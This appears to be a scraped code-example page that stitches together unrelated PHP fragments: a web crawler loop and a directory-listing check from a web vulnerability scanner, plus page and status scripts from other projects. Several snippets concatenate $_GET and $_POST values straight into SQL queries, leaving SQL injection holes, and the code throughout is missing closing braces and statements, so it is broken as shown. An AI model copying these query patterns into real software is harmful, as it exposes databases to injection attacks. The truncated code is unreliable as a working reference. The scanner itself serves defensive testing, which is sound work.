     $this->url_to_crawl = PHPCrawlerUtils::normalizeURL($this->url_to_crawl);
     // Init counters
     $links_followed = 0;
     $files_received = 0;
     // Put the first url into our main-array
     $tmp[0]["url_rebuild"] = $this->url_to_crawl;
     PHPCrawlerUtils::removeMatchingLinks($tmp, $this->not_follow_matches);
     if (isset($tmp[0]["url_rebuild"]) && $tmp[0]["url_rebuild"] != "") {
         PHPCrawlerUtils::addToArray($tmp, $this->urls_to_crawl, $this->url_map, $this->store_extended_linkinfo);
     // MAIN-LOOP -------------------------------------------------------------------
     // It works like this:
     // The first loop looks through all the "Priority"-arrays and checks if any
     // of these arrays is filled with URLS.
     for ($pri_level = $this->max_priority_level + 1; $pri_level > -1; $pri_level--) {
         // Yep. Found a priority-array with at least one URL
         if (isset($this->urls_to_crawl[$pri_level]) && !isset($stop_crawling)) {
             // Now "process" all URLS in this priroity-array
             while (list($key) = @each($this->urls_to_crawl[$pri_level])) {
                 $all_start = $this->getmicrotime();
                 $stop_crawling_this_level = false;
                 // init
                 // Request URL (crawl())
                 if (!isset($this->urls_to_crawl[$pri_level][$key]["referer_url"])) {
                     $this->urls_to_crawl[$pri_level][$key]["referer_url"] = "";
                 if ($db) {
                     incrementHttpRequests($db, $this->testId);
                 //Increment number of HTTP requests sent as fsockopen is called next
                 $page_data = $this->pageRequest->receivePage($this->urls_to_crawl[$pri_level][$key]["url_rebuild"], $this->urls_to_crawl[$pri_level][$key]["referer_url"]);
                 // If the request-object just irnored the URL ->
                 // -> Stop and remove URL from Array
                 if ($page_data == false) {
                 // Now $page_data["links_found"] contains all found links at this point
                 // Check if a "<base href.."-tag is given in the source and xtract
                 // the base URL
                 // !! Doesnt have to be rebuild cause it only can be a full
                 // qualified URL !!
                 $base_url = PHPCrawlerUtils::getBasePathFromTag($page_data["source"]);
                 if ($base_url == "") {
                     $actual_url =& $this->urls_to_crawl[$pri_level][$key]["url_rebuild"];
                 } else {
                     $actual_url = $base_url;
                 // Set flag "content_found" if..content was found
                 if (isset($page_data["http_status_code"]) && $page_data["http_status_code"] == 200) {
                     $content_found = true;
                 // Check for a REDIRECT-header and if wanted, put it into the array of found links
                 $redirect = PHPCrawlerUtils::getRedirectLocation($page_data["header"]);
                 if ($redirect && $this->follow_redirects == true) {
                     $tmp_array["link_raw"] = $redirect;
                     $tmp_array["referer_url"] = $this->urls_to_crawl[$pri_level][$key]["url_rebuild"];
                     $page_data["links_found"][] = $tmp_array;
                 // Count files that have been received completly
                 if ($page_data["received"] == true) {
                 // If traffic-limit is reached -> stop crawling
                 if ($page_data["traffic_limit_reached"] == true) {
                     $stop_crawling = true;
                 // Check if pagelimit is reached if set
                 // (and check WHICH page-limit was set)
                 if ($this->page_limit_all > 0) {
                     if ($this->page_limit_count_ct_only == true && $files_received >= $this->page_limit_all) {
                         $stop_crawling = true;
                     } elseif ($this->page_limit_count_ct_only == false && $links_followed >= $this->page_limit_all) {
                         $stop_crawling = true;
                 // Add the actual referer to the page_data array for the handlePageData-method
                 $page_data["refering_linktext"] =& $this->urls_to_crawl[$pri_level][$key]["linktext"];
                 $page_data["refering_link_raw"] =& $this->urls_to_crawl[$pri_level][$key]["link_raw"];
                 $page_data["refering_linkcode"] =& $this->urls_to_crawl[$pri_level][$key]["linkcode"];
                 // build new absolute URLs from found links
                 $page_data["links_found"] = PHPCrawlerUtils::buildURLs($page_data["links_found"], $actual_url);
                 // Call the overridable user-function here, but first
                 // "save" the found links from user-manipulation
                 $links_found = $page_data["links_found"];
                 $user_return = $this->handlePageData($page_data);
                 // Stop crawling if user returned a negative value
                 if ($user_return < 0) {
                     $stop_crawling = true;
                     $page_data["user_abort"] = true;
                 // Compare the found links with link-priorities set by the user
                 // and add the priority-level to our array $links_found
                 if ($this->benchmark == true) {
                     $bm_start = $this->getmicrotime();
                 PHPCrawlerUtils::addURLPriorities($links_found, $this->link_priorities);
                 if ($this->benchmark == true) {
                     echo "addUrlPriorities(): " . ($this->getmicrotime() - $bm_start) . "<br>";
                 // Here we can delete the tmp-file maybe created by the pageRequest-object
                 if (file_exists($this->pageRequest->tmp_file)) {
                 // Stop everything if a limit was reached
                 if (isset($stop_crawling)) {
                     $pri_level = 1000;
                 // Remove links to other hosts if follow_mode is 2 or 3
                 if ($this->general_follow_mode == 2 || $this->general_follow_mode == 3) {
                     PHPCrawlerUtils::removeURLsToOtherHosts($links_found, $this->urls_to_crawl[$pri_level][$key]["url_rebuild"]);
                 // Remove links to other domains if follow_mode=1
                 if ($this->general_follow_mode == 1) {
                     PHPCrawlerUtils::removeURLsToOtherDomains($links_found, $this->urls_to_crawl[$pri_level][$key]["url_rebuild"]);
                 // Remove "pathUp"-links if follow_mode=3
                 // (fe: base-site: www.foo.com/bar/index.htm -> dont follow: www.foo.com/anotherbar/xyz)
                 if ($this->general_follow_mode == 3) {
                     PHPCrawlerUtils::removePathUpLinks($links_found, $this->url_to_crawl);
                 // If given, dont follow "not matching"-links
                 // (dont follow given preg_matches)
                 if (count($this->not_follow_matches) > 0) {
                     PHPCrawlerUtils::removeMatchingLinks($links_found, $this->not_follow_matches);
                 // If given, just follow "matching"-links
                 // (only follow given preg_matches)
                 if (count($this->follow_matches) > 0) {
                     $links_found =& PHPCrawlerUtils::removeNotMatchingLinks($links_found, $this->follow_matches);
                 // Add found and filtered links to the main_array urls_to_crawl
                 if ($this->benchmark == true) {
                     $bm_start = $this->getmicrotime();
                 PHPCrawlerUtils::addToArray($links_found, $this->urls_to_crawl, $this->url_map, $this->store_extended_linkinfo);
                 if ($this->benchmark == true) {
                     echo "addToArray(): " . ($this->getmicrotime() - $bm_start) . "<br>";
                 // If there is wasnt any content found so far (code 200) and theres
                 // a redirect location
                 // -> follow it, doesnt matter what follow-mode was choosen !
                 // (put it into the main-array !)
                 if (!isset($content_found) && $redirect != "" && $this->follow_redirects_till_content == true) {
                     $rd[0]["url_rebuild"] = phpcrawlerutils::buildURL($redirect, $actual_url);
                     $rd[0]["priority_level"] = 0;
                     PHPCrawlerUtils::addToArray($rd, $this->urls_to_crawl, $this->url_map, $this->store_extended_linkinfo);
                 // Now we remove the actual URL from the priority-array
                 // Now we check if a priority-array with a higher priority
                 // contains URLS and if so, stop processing this pri-array and "switch" to the higher
                 // one
                 for ($pri_level_check = $this->max_priority_level + 1; $pri_level_check > $pri_level; $pri_level_check--) {
                     if (isset($this->urls_to_crawl[$pri_level_check]) && $pri_level_check > $pri_level) {
                         $stop_crawling_this_level = true;
                 // Stop crawling this level
                 if ($stop_crawling_this_level == true) {
                     $pri_level = $this->max_priority_level + 1;
                 // Unset crawled URL, not nedded anymore
                 // echo "All:".($this->getmicrotime()-$all_start);
             // end of loop over priority-array
             // If a priority_level was crawled completely -> unset the whole array
             if ($stop_crawling_this_level == false) {
         // end if priority-level exists
     // end of main loop
     // Loop stopped here, build report-array (status_return)
     $this->status_return["links_followed"] = $links_followed;
     $this->status_return["files_received"] = $files_received;
     $this->status_return["bytes_received"] = $this->pageRequest->traffic_all;
     $this->status_return["traffic_limit_reached"] = $page_data["traffic_limit_reached"];
     if (isset($page_data["file_limit_reached"])) {
         $this->status_return["file_limit_reached"] = $page_data["file_limit_reached"];
     } else {
         $this->status_return["file_limit_reached"] = false;
     if (isset($page_data["user_abort"])) {
         $this->status_return["user_abort"] = $page_data["user_abort"];
     } else {
         $this->status_return["user_abort"] = false;
     if (isset($stop_crawling)) {
         $this->status_return["limit_reached"] = true;
     } else {
         $this->status_return["limit_reached"] = false;
     // Process-time
     $this->status_return["process_runtime"] = $this->getMicroTime() - $starting_time;
     // Average bandwith / throughput
     $this->status_return["data_throughput"] = round($this->status_return["bytes_received"] / $this->status_return["process_runtime"]);
     if ($this->firstCrawl) {
         $query = "UPDATE tests SET status = 'Finished Crawling!' WHERE id = {$this->testId};";
         if (connectToDb($db)) {
             $duration = $this->status_return["process_runtime"];
             $query = "UPDATE tests SET duration = {$duration} WHERE id = {$this->testId};";
コード例 #27
include_once "scripts/OnDemandServices.php";
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

	<meta http-equiv="content-type" content="text/html; charset=UTF-8" />

$meta_description = "Tech OnDemand is an open repository of academic resources aimed to educate anyone who is interested in the various technical topics offered at the Georgia Institute of Technology.";
echo '<meta name="description" content="' . $meta_description . '" />';
if (isset($_GET['pid'])) {
    $Q = mysql_query("SELECT * FROM `PostCollection1332` WHERE `postid`=" . $_GET['pid']);
    $Q = mysql_fetch_array($Q);
    $Q = $Q['title'];
} else {
    if (isset($_GET['cid'])) {
        $Q = mysql_query("SELECT * FROM `ClassCollection` WHERE `classid`=" . $_GET['cid']);
        $Q = mysql_fetch_array($Q);
        $Q = $Q['subject'] . ' ' . $Q['number'] . ': ' . $Q['title'];
    } else {
        $Q = "Tech OnDemand";
echo '<meta property="og:title" content="' . addslashes($Q) . '" />';
echo '<meta property="og:description" content="' . $meta_description . '" />';
コード例 #28
function testDirectoryListingEnabled($urlToScan, $siteBeingTested, $testId, $crawlUrlFlag)
    updateStatus($db, "Testing for {$urlToScan} for Directory Listing enabled...", $testId);
    $log = new Logger();
    $log->lwrite("Testing for {$urlToScan} for Directory Listing enabled");
    if ($crawlUrlFlag) {
        //Perform crawl again but allow images, etc. this time to capture every URL
        $crawlerNew =& new MyCrawler();
        $log->lwrite("Crawling {$urlToScan} again for all links including images, css, etc, in order to identify directories");
        $urlsFound = $crawlerNew->urlsFound;
        $logStr = sizeof($urlsFound) . ' URLs found for test: ' . $testId;
        $log->lwrite("All URLs found during crawl for directory listing check:");
        foreach ($urlsFound as $currentUrl) {
        $relativePathUrls = array();
        foreach ($urlsFound as $currentUrl) {
            $currentUrl = str_replace($urlToScan, '', $currentUrl);
            array_push($relativePathUrls, $currentUrl);
        $directories = array();
        //Check if relative path contain a directory and if they do, add it to a list of directories
        foreach ($relativePathUrls as $relativePathUrl) {
            if (dirname($relativePathUrl) != '.') {
                $dir = dirname($relativePathUrl);
                if (!in_array($dir, $directories) && !empty($dir) && !strpos($dir, '?')) {
                    array_push($directories, $dir);
                    $log->lwrite("Found directory {$dir}");
    } else {
        $directories = array(1);
    //Just need to make an array of size one so the for loop below iterates once
    $http = new http_class();
    $http->timeout = 0;
    $http->data_timeout = 0;
    $http->user_agent = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)";
    $http->follow_redirect = 1;
    $http->redirection_limit = 5;
    //Regular expressions that will indicate directory listing is enabled
    $regexs = array("/Parent Directory/", "/\\bDirectory Listing\\b.*(Tomcat|Apache)/", "/Parent directory/", "/\\bDirectory\\b/", "/[\\s<]+IMG\\s*=/");
    foreach ($directories as $directory) {
        if ($crawlUrlFlag) {
            $testUrl = $urlToScan . $directory . '/';
        } else {
            $testUrl = $siteBeingTested;
        $error = $http->GetRequestArguments($testUrl, $arguments);
        $error = $http->Open($arguments);
        $log->lwrite("URL to be requested is: {$testUrl}");
        if ($error == "") {
            $log->lwrite("Sending HTTP request to {$testUrl}");
            $error = $http->SendRequest($arguments);
            if ($error == "") {
                $headers = array();
                $error = $http->ReadReplyHeaders($headers);
                if ($error == "") {
                    $responseCode = $http->response_status;
                    //This is a string
                    $log->lwrite("Received response code: {$responseCode}");
                    if (intval($responseCode) >= 200 && intval($responseCode) < 300) {
                        $vulnerabilityFound = false;
                        $error = $http->ReadWholeReplyBody($body);
                        if (strlen($error) == 0) {
                            $indicatorStr = '';
                            if (preg_match($regexs[0], $body)) {
                                $vulnerabilityFound = true;
                                $indicatorStr = $regexs[0];
                            } else {
                                if (preg_match($regexs[1], $body)) {
                                    $vulnerabilityFound = true;
                                    $indicatorStr = $regexs[1];
                                } else {
                                    if (preg_match($regexs[2], $body)) {
                                        $vulnerabilityFound = true;
                                        $indicatorStr = $regexs[2];
                                    } else {
                                        if (preg_match($regexs[3], $body)) {
                                            if (preg_match($regexs[4], $body)) {
                                                $vulnerabilityFound = true;
                                                $indicatorStr = $regexs[3] . ' and ' . $regexs[4];
                            if ($vulnerabilityFound) {
                                //The echo's are for testing function on its own
                                echo '<br>Directory Listing Enabled!<br>Url: ' . $testUrl . '<br>';
                                echo 'Method: GET <br>';
                                echo 'Url Requested: ' . $testUrl . '<br>';
                                echo "Error: Received response code: {$responseCode} after requesting a directory and regular expression: {$indicatorStr}<br>";
                                $tableName = 'test' . $testId;
                                //Check if this vulnerability has already been found and added to DB. If it hasn't, add it to DB.
                                $query = "SELECT * FROM test_results WHERE test_id = {$testId} AND type = 'dirlist' AND method = 'get' AND url = '{$testUrl}' AND attack_str = '{$testUrl}'";
                                $result = $db->query($query);
                                if (!$result) {
                                    $log->lwrite("Could not execute query {$query}");
                                } else {
                                    $log->lwrite("Successfully executed query {$query}");
                                    $numRows = $result->num_rows;
                                    if ($numRows == 0) {
                                        $log->lwrite("Number of rows is {$numRows} for query: {$query}");
                                        insertTestResult($db, $testId, 'dirlist', 'get', $testUrl, $testUrl);
        if (strlen($error)) {
            echo "<H2 align=\"center\">Error: ", $error, "</H2>\n";
            $log->lwrite("Error: {$error}");
コード例 #29
ファイル: history.php プロジェクト: Zoocha/pt-reporting

        <h2 class="text-center underlined">Projects</h2>

        <div class="container-fluid">
            <div class="row">
                <div class="col-sm-12 col-md-12 main">
                    <div class="table-responsive" id="main_table">
                        <table class="table table-striped data_table" id="table1">
//Display the table
require_once 'lib.php';
require_once 'database.ini';
$connection = connectToDb();
$history_data = getRawHistoryData($connection);
$table = reportAllHistory($history_data, "html");
echo $table;
$connection = null;


        <h2  class="text-center underlined">All Project Statistics</h2>
コード例 #30
ファイル: getStatus.php プロジェクト: 3nj0y/webvulscan
// - Calliope(http://www.towfiqi.com/xhtml-template-calliope.html) -
//   Licensed under the Creative Commons Attribution 3.0 Unported License
// This software was developed, and should only be used, entirely for
// ethical purposes. Running security testing tools such as this on a
// website(web application) could damage it. In order to stay ethical,
// you must ensure you have permission of the owners before testing
// a website(web application). Testing the security of a website(web application)
// without authorisation is unethical and against the law in many countries.
$currentDir = './';
require_once $currentDir . 'functions/databaseFunctions.php';
isset($_POST['testId']) ? $testId = $_POST['testId'] : ($testId = 0);
$query = "SELECT * FROM tests WHERE id = {$testId};";
$result = $db->query($query);
$row = $result->fetch_object();
$finished = $row->scan_finished;
//Update finish time to current time while scan is not finished
if ($finished == 0) {
    $now = time();
    $query = "UPDATE tests SET finish_timestamp = {$now} WHERE id = {$testId};";
    $result = $db->query($query);
$query = "SELECT * FROM tests WHERE id = {$testId};";
$result = $db->query($query);
$row = $result->fetch_object();
$status = $row->status;
$startTime = $row->start_timestamp;